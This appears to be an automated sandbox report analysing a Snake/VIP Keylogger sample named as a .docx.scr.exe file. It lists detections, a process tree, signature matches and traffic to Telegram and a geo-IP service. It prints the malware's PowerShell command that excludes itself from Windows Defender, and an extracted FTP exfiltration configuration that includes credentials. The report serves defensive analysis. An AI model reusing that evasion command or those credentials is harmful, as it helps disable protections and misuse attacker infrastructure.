Edit tour

Windows Analysis Report
HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Overview

General Information

Sample name:	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Analysis ID:	1576530
MD5:	bf49fb7c260b15a61c5849a49fdee343
SHA1:	059f7b0a2d5f6b18a06f9ccd2995a7ecb9d69b14
SHA256:	4733c3841f338c4b95b5226678de7358eaf8604750ee3aa3c3d55ce829db11b3
Tags:	exeSnakeKeyloggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe (PID: 1376 cmdline: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe" MD5: BF49FB7C260B15A61C5849A49FDEE343)

powershell.exe (PID: 4908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe" MD5: BF49FB7C260B15A61C5849A49FDEE343)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d91c:$a1: get_encryptedPassword 0x2dc21:$a2: get_encryptedUsername 0x2d728:$a3: get_timePasswordChanged 0x2d823:$a4: get_passwordField 0x2d932:$a5: set_encryptedPassword 0x2efbf:$a7: get_logins 0x2ef22:$a10: KeyLoggerEventArgs 0x2eb87:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36f8d4:$a1: get_encryptedPassword 0x3b2cf4:$a1: get_encryptedPassword 0x3f5f14:$a1: get_encryptedPassword 0x36fbd9:$a2: get_encryptedUsername 0x3b2ff9:$a2: get_encryptedUsername 0x3f6219:$a2: get_encryptedUsername 0x36f6e0:$a3: get_timePasswordChanged 0x3b2b00:$a3: get_timePasswordChanged 0x3f5d20:$a3: get_timePasswordChanged 0x36f7db:$a4: get_passwordField 0x3b2bfb:$a4: get_passwordField 0x3f5e1b:$a4: get_passwordField 0x36f8ea:$a5: set_encryptedPassword 0x3b2d0a:$a5: set_encryptedPassword 0x3f5f2a:$a5: set_encryptedPassword 0x370f77:$a7: get_logins 0x3b4397:$a7: get_logins 0x3f75b7:$a7: get_logins 0x370eda:$a10: KeyLoggerEventArgs 0x3b42fa:$a10: KeyLoggerEventArgs 0x3f751a:$a10: KeyLoggerEventArgs
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xcfdce:$a1: get_encryptedPassword 0xcffe4:$a2: get_encryptedUsername 0xcfbf7:$a3: get_timePasswordChanged 0xcfce6:$a4: get_passwordField 0xcfde4:$a5: set_encryptedPassword 0xd1cd8:$a7: get_logins 0xd1c50:$a10: KeyLoggerEventArgs 0xd19e6:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x93605:$a1: get_encryptedPassword 0x93900:$a2: get_encryptedUsername 0x9341b:$a3: get_timePasswordChanged 0x93516:$a4: get_passwordField 0x9361b:$a5: set_encryptedPassword 0x95a8a:$a7: get_logins 0x959ed:$a10: KeyLoggerEventArgs 0x95656:$a11: KeyLoggerEventArgsEventHandler
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bd1c:$a1: get_encryptedPassword 0x2c021:$a2: get_encryptedUsername 0x2bb28:$a3: get_timePasswordChanged 0x2bc23:$a4: get_passwordField 0x2bd32:$a5: set_encryptedPassword 0x2d3bf:$a7: get_logins 0x2d322:$a10: KeyLoggerEventArgs 0x2cf87:$a11: KeyLoggerEventArgsEventHandler
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39bad:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39250:$a3: \Google\Chrome\User Data\Default\Login Data 0x394ad:$a4: \Orbitum\User Data\Default\Login Data 0x39e8c:$a5: \Kometa\User Data\Default\Login Data
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c91c:$s1: UnHook 0x2c923:$s2: SetHook 0x2c92b:$s3: CallNextHook 0x2c938:$s4: _hook
3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2db1c:$a1: get_encryptedPassword 0x2de21:$a2: get_encryptedUsername 0x2d928:$a3: get_timePasswordChanged 0x2da23:$a4: get_passwordField 0x2db32:$a5: set_encryptedPassword 0x2f1bf:$a7: get_logins 0x2f122:$a10: KeyLoggerEventArgs 0x2ed87:$a11: KeyLoggerEventArgsEventHandler
3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b9ad:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b050:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b2ad:$a4: \Orbitum\User Data\Default\Login Data 0x3bc8c:$a5: \Kometa\User Data\Default\Login Data
3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e71c:$s1: UnHook 0x2e723:$s2: SetHook 0x2e72b:$s3: CallNextHook 0x2e738:$s4: _hook
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2db1c:$a1: get_encryptedPassword 0x70f3c:$a1: get_encryptedPassword 0xb415c:$a1: get_encryptedPassword 0x2de21:$a2: get_encryptedUsername 0x71241:$a2: get_encryptedUsername 0xb4461:$a2: get_encryptedUsername 0x2d928:$a3: get_timePasswordChanged 0x70d48:$a3: get_timePasswordChanged 0xb3f68:$a3: get_timePasswordChanged 0x2da23:$a4: get_passwordField 0x70e43:$a4: get_passwordField 0xb4063:$a4: get_passwordField 0x2db32:$a5: set_encryptedPassword 0x70f52:$a5: set_encryptedPassword 0xb4172:$a5: set_encryptedPassword 0x2f1bf:$a7: get_logins 0x725df:$a7: get_logins 0xb57ff:$a7: get_logins 0x2f122:$a10: KeyLoggerEventArgs 0x72542:$a10: KeyLoggerEventArgs 0xb5762:$a10: KeyLoggerEventArgs
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b9ad:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7edcd:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc1fed:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b050:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e470:$a3: \Google\Chrome\User Data\Default\Login Data 0xc1690:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b2ad:$a4: \Orbitum\User Data\Default\Login Data 0x7e6cd:$a4: \Orbitum\User Data\Default\Login Data 0xc18ed:$a4: \Orbitum\User Data\Default\Login Data 0x3bc8c:$a5: \Kometa\User Data\Default\Login Data 0x7f0ac:$a5: \Kometa\User Data\Default\Login Data 0xc22cc:$a5: \Kometa\User Data\Default\Login Data
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e71c:$s1: UnHook 0x71b3c:$s1: UnHook 0xb4d5c:$s1: UnHook 0x2e723:$s2: SetHook 0x71b43:$s2: SetHook 0xb4d63:$s2: SetHook 0x2e72b:$s3: CallNextHook 0x71b4b:$s3: CallNextHook 0xb4d6b:$s3: CallNextHook 0x2e738:$s4: _hook 0x71b58:$s4: _hook 0xb4d78:$s4: _hook
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb513c:$a1: get_encryptedPassword 0xf855c:$a1: get_encryptedPassword 0x13b77c:$a1: get_encryptedPassword 0xb5441:$a2: get_encryptedUsername 0xf8861:$a2: get_encryptedUsername 0x13ba81:$a2: get_encryptedUsername 0xb4f48:$a3: get_timePasswordChanged 0xf8368:$a3: get_timePasswordChanged 0x13b588:$a3: get_timePasswordChanged 0xb5043:$a4: get_passwordField 0xf8463:$a4: get_passwordField 0x13b683:$a4: get_passwordField 0xb5152:$a5: set_encryptedPassword 0xf8572:$a5: set_encryptedPassword 0x13b792:$a5: set_encryptedPassword 0xb67df:$a7: get_logins 0xf9bff:$a7: get_logins 0x13ce1f:$a7: get_logins 0xb6742:$a10: KeyLoggerEventArgs 0xf9b62:$a10: KeyLoggerEventArgs 0x13cd82:$a10: KeyLoggerEventArgs
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c75c:$a1: get_encryptedPassword 0x17fb7c:$a1: get_encryptedPassword 0x1c2d9c:$a1: get_encryptedPassword 0x13ca61:$a2: get_encryptedUsername 0x17fe81:$a2: get_encryptedUsername 0x1c30a1:$a2: get_encryptedUsername 0x13c568:$a3: get_timePasswordChanged 0x17f988:$a3: get_timePasswordChanged 0x1c2ba8:$a3: get_timePasswordChanged 0x13c663:$a4: get_passwordField 0x17fa83:$a4: get_passwordField 0x1c2ca3:$a4: get_passwordField 0x13c772:$a5: set_encryptedPassword 0x17fb92:$a5: set_encryptedPassword 0x1c2db2:$a5: set_encryptedPassword 0x13ddff:$a7: get_logins 0x18121f:$a7: get_logins 0x1c443f:$a7: get_logins 0x13dd62:$a10: KeyLoggerEventArgs 0x181182:$a10: KeyLoggerEventArgs 0x1c43a2:$a10: KeyLoggerEventArgs
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb5d3c:$s1: UnHook 0xf915c:$s1: UnHook 0x13c37c:$s1: UnHook 0xb5d43:$s2: SetHook 0xf9163:$s2: SetHook 0x13c383:$s2: SetHook 0xb5d4b:$s3: CallNextHook 0xf916b:$s3: CallNextHook 0x13c38b:$s3: CallNextHook 0xb5d58:$s4: _hook 0xf9178:$s4: _hook 0x13c398:$s4: _hook
0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13d35c:$s1: UnHook 0x18077c:$s1: UnHook 0x1c399c:$s1: UnHook 0x13d363:$s2: SetHook 0x180783:$s2: SetHook 0x1c39a3:$s2: SetHook 0x13d36b:$s3: CallNextHook 0x18078b:$s3: CallNextHook 0x1c39ab:$s3: CallNextHook 0x13d378:$s4: _hook 0x180798:$s4: _hook 0x1c39b8:$s4: _hook
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ParentImage: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ParentProcessId: 1376, ParentProcessName: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ProcessId: 4908, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ParentImage: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ParentProcessId: 1376, ParentProcessName: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe", ProcessId: 4908, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:33:17.134618+0100	2803305	3	Unknown Traffic	192.168.2.4	49736	104.21.67.152	443	TCP
2024-12-17T08:33:20.067027+0100	2803305	3	Unknown Traffic	192.168.2.4	49739	104.21.67.152	443	TCP
2024-12-17T08:33:23.020648+0100	2803305	3	Unknown Traffic	192.168.2.4	49741	104.21.67.152	443	TCP
2024-12-17T08:33:26.024751+0100	2803305	3	Unknown Traffic	192.168.2.4	49744	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:33:12.799786+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2024-12-17T08:33:15.515581+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2024-12-17T08:33:18.421884+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.130.0	80	TCP
2024-12-17T08:33:21.343965+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Avira: detected

Found malware configuration

Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "belogswork@inhanoi.net.vn", "Password": "usarmy11111@@", "FTP Server": "ftp://ftp.inhanoi.net.vn/", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Virustotal: Detection: 30%			Perma Link
Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2

Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Iecr.pdb source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
Source:	Binary string: Iecr.pdbSHA256 source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe

Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F85678h	3_2_06F85260
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F850B1h	3_2_06F84E00
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F831A5h	3_2_06F82FC8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F83B2Fh	3_2_06F82FC8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06F824C8
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F85678h	3_2_06F855A6
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F8F829h	3_2_06F8F580
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F85678h	3_2_06F8525A
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F8F3D1h	3_2_06F8F128
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06F82CEB
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06F82B0B
Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Code function: 4x nop then jmp 06F8FC81h	3_2_06F8F9D8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
